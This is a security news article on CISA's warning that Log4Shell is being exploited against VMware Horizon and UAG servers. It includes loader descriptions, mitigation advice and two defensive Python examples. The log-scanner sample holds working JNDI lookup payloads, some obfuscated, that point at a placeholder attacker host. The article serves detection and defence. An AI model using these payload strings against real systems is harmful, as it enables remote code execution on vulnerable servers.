CISA and the United States Coast Guard Cyber Command (CGCYBER) are warning that the threat of Log4Shell hasn’t gone away. It’s being actively exploited and used to target organisations using VMware Horizon and Unified Access Gateway servers.
Log4Shell: what is it?
Log4Shell was a zero-day vulnerability in Log4j, an open source logging library written in Java that is used by millions of applications, many of them incredibly popular. The easy-to-trigger attack could be used to perform remote code execution (RCE) on vulnerable systems: if attackers managed to get an affected app to log a specially crafted string, it was game over, and they could gain full control over the target system. The system(s) at that point were ripe for further exploitation.
Discovered in November 2021, the vulnerability was estimated to potentially affect hundreds of millions of devices. With so much potential for damage, fixes were quickly developed and released on December 6, three days before the vulnerability was published.
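The "special string" described above is a Log4j lookup of the form ${jndi:...}, and attackers routinely wrap it in nested lookups so that the literal text never appears contiguously. The following scanner is an added example for defenders, not code from the original post or from CISA: it normalises those wrappers and flags the log lines that carried a lookup. The log lines are constructed for the example, and the attacker host names are placeholders.

```python
import re

# Obfuscation wrappers attackers nest inside the lookup so that "jndi" never
# appears as one contiguous word. Each wrapper resolves to a single character.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")  # ${::-j}, ${env:NOPE:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups until the text stops changing."""
    for _ in range(max_rounds):
        reduced = _CASE_WRAPPER.sub(r"\1", text)
        reduced = _DEFAULT_WRAPPER.sub(r"\1", reduced)
        if reduced == text:
            break
        text = reduced
    return text


def scan_lines(lines):
    """Return (1-based line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reduced = normalize(line)
        if _JNDI.search(reduced):
            hits.append((number, reduced))
    return hits


# Constructed access-log lines in combined format; the last field is the
# User-Agent, one of the headers a Log4j-backed web tier commonly logs.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:rmi://attacker.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:11 +0000] "GET /login HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.invalid/c}"',
]

if __name__ == "__main__":
    for number, line in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

A hit only proves that an exploitation attempt reached the logger; whether it succeeded is settled by the outbound LDAP or RMI connection from the Log4j host that follows, so pair this scan with egress logs from the same window.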
Related bugs and additional vulnerabilities were also discovered and subsequently patched.
Broadening Log4Shell’s horizons
According to CISA and CGCYBER, Log4Shell has been used to exploit unpatched, public-facing VMware Horizon and UAG servers. Suspected APT threat actors…
…implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
Attackers made use not only of malware and HTTP, but also of PowerShell scripts and Remote Desktop Protocol (RDP); RDP in particular was used to move laterally to other hosts inside the organisation’s production environment.
Compromised administrator accounts were used to run several additional forms of loader malware. Here are some of the samples found by CISA during one investigation:
- SvcEdge.exe is a malicious Windows loader containing encrypted executable f7_dump_64.exe. When executed, SvcEdge.exe decrypts and loads f7_dump_64.exe into memory.
- odbccads.exe is a malicious Windows loader containing an encrypted executable. When executed, odbccads.exe decrypts and loads the executable into memory.
- praiser.exe is a Windows loader containing an encrypted executable. When executed, praiser.exe decrypts and loads the executable into memory.
- fontdrvhosts.exe is a Windows loader that contains an encrypted executable. When executed, fontdrvhosts.exe decrypts and loads the executable into memory.
- winds.exe is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. winds.exe has complex obfuscation, hindering the analysis of its code structures.
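The loaders above share two traits a responder can hunt for: a filename from the CISA list, and a body that is mostly encrypted payload, which shows up as near-maximal byte entropy. The triage routine below is an added example and not code from the original post or from CISA; the filenames come from the list above, the entropy heuristic and its 7.2 bits/byte threshold are assumptions, and the service images are constructed stand-ins rather than real binaries.

```python
import math
from collections import Counter

# Loader filenames reported by CISA in the investigation described above.
LOADER_NAMES = {"svcedge.exe", "odbccads.exe", "praiser.exe", "fontdrvhosts.exe", "winds.exe"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 when every byte value is equally frequent."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def triage(image_path: str, content: bytes, threshold: float = 7.2) -> dict:
    """Score one service image; reasons is empty when nothing matched."""
    name = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    reasons = []
    if name in LOADER_NAMES:
        reasons.append("filename matches a loader named in the CISA investigation")
    entropy = shannon_entropy(content)
    if entropy >= threshold:  # assumed threshold; encrypted or packed payloads sit near 8.0
        reasons.append(f"high entropy ({entropy:.2f} bits/byte) suggests an encrypted embedded executable")
    return {"path": image_path, "entropy": round(entropy, 2), "reasons": reasons}


def flagged(services: dict) -> list:
    """Paths of every image with at least one reason, for the analyst to pull and inspect."""
    return [path for path, content in services.items() if triage(path, content)["reasons"]]


# Constructed stand-ins for service binaries: a benign low-entropy image, a
# high-entropy image carrying a reported loader name, and a high-entropy image
# under an unreported name that still deserves a look.
SAMPLE_SERVICES = {
    r"C:\Windows\System32\svchost.exe": b"MZ" + bytes(512),
    r"C:\ProgramData\winds.exe": b"MZ" + bytes(range(256)) * 8,
    r"C:\Users\Public\update.exe": bytes(range(256)) * 4,
}

if __name__ == "__main__":
    for path, content in SAMPLE_SERVICES.items():
        result = triage(path, content)
        print(result["path"], result["entropy"], result["reasons"] or "clean")
```

On a live host the inputs would come from the service configuration (for example the PathName property of Win32_Service via Get-CimInstance) with each image read from disk; a name match is the strong signal, while the entropy score is only a prompt to inspect an unfamiliar binary, since legitimately packed software scores high as well.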
Advice for securing installations
CISA/CGCYBER are quite clear about this. Organisations which haven’t applied patches released back in December should treat any and all affected VMware systems as compromised:
- Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
- Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.
- See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
- Note: Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
- If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
- Prior to implementing any temporary solution, ensure appropriate backups have been completed.
- Verify successful implementation of mitigations by executing the vendor-supplied script without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
Log4Shell, rated a 10 in the Common Vulnerability Scoring System (CVSS), is not to be trifled with. We advise affected organisations to pay heed to the warnings above and set about patching as soon as possible.